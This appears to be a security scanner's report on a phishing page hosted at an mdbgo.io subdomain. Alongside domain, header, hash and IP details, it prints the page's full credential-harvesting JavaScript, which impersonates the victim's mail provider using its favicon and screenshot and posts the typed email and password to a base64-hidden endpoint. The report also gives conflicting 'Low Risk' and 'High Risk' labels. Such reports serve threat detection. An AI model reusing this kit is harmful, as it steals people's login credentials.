malicious

other

suspicious phishing

English

The domain 'haterman01-email-fix-server0978u7y65.mdbgo.io' uses the British Indian Ocean Territory country-code top-level domain (.io), featuring subdomain 'haterman01-email-fix-server0978u7y65'. The second-level label 'mdbgo' is 5 characters long split between 1 vowel and four consonants. Segmentation suggests three words: m, db, go. Median word length comes out to 2 characters. No strong language cues emerged from the frequency lists.

email

password

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes

9c1aa8ff8c9c789cf517f02372786914a33b97af85ba3b0071897b759a61836f

865c09794c9492e085970a234a969ebf3f888588389122476f85be12841b9f57

viewport

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/


            $(document).ready(function() {
              const getit = new URLSearchParams(window.location.search);
              const hashedget = getit.get('e');
              if (!hashedget) {
                $('html').text('Error');
                window.stop;
              }else{
              $("#email").val(hashedget);
              let dxmain = hashedget.split("@")[1];
              let sitename = dxmain.split(".")[0].toUpperCase();
              sitename = sitename.charAt(0).toUpperCase() + sitename.slice(1).toLowerCase();
              document.querySelector('title').prepend(sitename);
              let favimg = atob('aHR0cHM6Ly90MS5nc3RhdGljLmNvbS9mYXZpY29uVjI/Y2xpZW50PVNPQ0lBTCZ0eXBlPUZBVklDT04mZmFsbGJhY2tfb3B0cz1UWVBFLFNJWkUsVVJMJnNpemU9NjQmdXJsPWh0dHA6Ly8=')+dxmain
              document.querySelector('link[rel="shortcut icon"]').setAttribute('href', favimg);
              document.querySelector('body').style.backgroundImage = `url('https://image.thum.io/get/width/1200/http://${dxmain}')`;
              document.querySelector('#logo').setAttribute('src', favimg);
              let atobb = atob( $('form').attr('action') )
              var checker = 0
                $("form").on('submit', (event) =>{
                    event.preventDefault();
                    event.stopPropagation();
                    $(".erx").hide();
                    let email = $("#email").val()
                    let password = $("#password").val()
                    checker++;
                    $.ajax({
                        
                        url: atobb,
                        method: "post",
                        data: {
                            email: email,
                            pass: password,
                            clientUrl: `https://${dxmain}`,
                            typesent: ""                            
                        },
                        beforeSend: ()=>{
                            $("#getitBtn").prop('disabled', true).html("Verifying...")
                        },
                        success: (data)=>{
                            $(".erx").show();

                            if (checker > 3) {
                                window.location.href="//"+domain;
                            }
                            setTimeout(() => {
                                $("#password").val("").focus();
                            }, 100);
                        },
                        error: (err, xhr) =>{
                            console.log(err, xhr);
                        },
                        complete: function(){
                          $('#getitBtn').prop('disabled', false).html("Sign In")
                        }               
                    })
                });                 
              }
            });

function togglePasswordVisibility(){const e=document.getElementById("password"),t=document.getElementById("togglePassword");"password"===e.type?(e.type="text",t.classList.remove("fa-eye"),t.classList.add("fa-eye-slash")):(e.type="password",t.classList.remove("fa-eye-slash"),t.classList.add("fa-eye"))}

    

Btcexplore - MAIL SYSTEM Sign in to continue

✅ Low Risk - https://haterman01-email-fix-server0978u7y65.mdbgo.io/index.html?e=accounts@btcexplore.com

Requests	IP Address	Location	AS Autonomous System
3	172.217.23.99	United States	AS15169GOOGLE
2	104.17.25.14	United States	AS13335CLOUDFLARENET
2	142.250.185.68	United States	AS15169GOOGLE
1	142.250.185.234	United States	AS15169GOOGLE
1	93.105.88.216	Wroclaw, Lower Silesia, Poland	AS50606Horyzont Technologie Internetowe sp.z.o.o.
1	146.75.120.193	Frankfurt am Main, Hesse, Germany	AS54113FASTLY
1	151.101.193.229	San Francisco, California, United States	AS54113FASTLY
1	107.21.221.175	Ashburn, Virginia, United States	AS14618AMAZON-AES
0	2a04:4e42:400::485	United States	AS54113FASTLY
0	2a04:4e42:600::485	United States	AS54113FASTLY
12	22	-	-

Security Scan Report: haterman01-email-fix-server0978u7y65.mdbgo.io

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Content Similarity HashesFor malware variant detection

Image Hashes

Perceptual Hashes

Other Hashes

Scan History